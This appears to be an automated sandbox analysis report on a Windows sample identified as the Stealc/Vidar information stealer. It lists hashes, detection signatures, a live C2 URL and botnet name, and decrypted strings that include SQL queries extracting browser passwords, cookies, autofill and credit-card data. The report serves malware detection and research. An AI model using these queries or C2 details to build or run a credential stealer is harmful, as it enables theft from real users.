Windows Analysis Report
LisectAVT_2403002A_326.exe

Overview

General Information

Sample name: LisectAVT_2403002A_326.exe
Analysis ID: 1482336
MD5: 14e1e4337af72bdba22538a1bc405427
SHA1: 9bacc38599dab1dcf1216d24c2816a6f016ce04a
SHA256: 339ea64849ebf88f3c2f7195c572ff95bf71099eed82cee1af3f1d2b2b591c9e
Tags: exe

Detection

Go Injector, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Go Injector
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Injects a PE file into a foreign process
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: LisectAVT_2403002A_326.exe Avira: detected
Source: http://193.143.1.226/129edec4272dc2c8.php Avira URL Cloud: Label: malware
Source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://193.143.1.226/129edec4272dc2c8.php"}
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://193.143.1.226/129edec4272dc2c8.php", "Botnet": "newpakistan"}
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 10
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 04
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 20
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 24
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcAddress
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcatA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sleep
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpyA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrlenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ExitProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: advapi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: user32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: crypt32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ntdll.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateDCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReleaseDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sscanf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VMwareVMware
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HAL9TH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: JohnDoe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DISPLAY
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: http://193.143.1.226
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /129edec4272dc2c8.php
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /cdb52cf952e86d4b/
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: newpakistan
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalLock
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IsWow64Process
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32Next
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocalTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FreeLibrary
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32First
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindNextFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindClose
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetFilePointer
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WriteFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CopyFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualProtect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLastError
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpynA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TerminateProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ole32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wininet.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shell32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: psapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SelectObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BitBlt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoUninitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoInitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowRect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CharToOemW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegCloseKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetConnectA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrStrA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmStartSession
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmGetList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmEndSession
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_open
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_step
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_close
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encrypted_key
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PATH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: NSS_Init
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: browser:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: profile:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: url:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: login:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: password:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OperaGX
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Network
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: .txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TRUE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FALSE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: autofill
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: history
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: name:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: month:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: year:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: card:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Login Data
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Web Data
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: History
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: logins.json
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: formSubmitURL
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: usernameField
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encryptedUsername
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encryptedPassword
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: guid
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: places.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: plugins
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IndexedDB
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera Stable
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CURRENT
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: chrome-extension_
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Local State
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: profiles.ini
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: chrome
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: opera
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: firefox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wallets
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ProductName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: x32
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: x64
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DisplayName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DisplayVersion
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Network Info:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - IP: IP?
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Country: ISO?
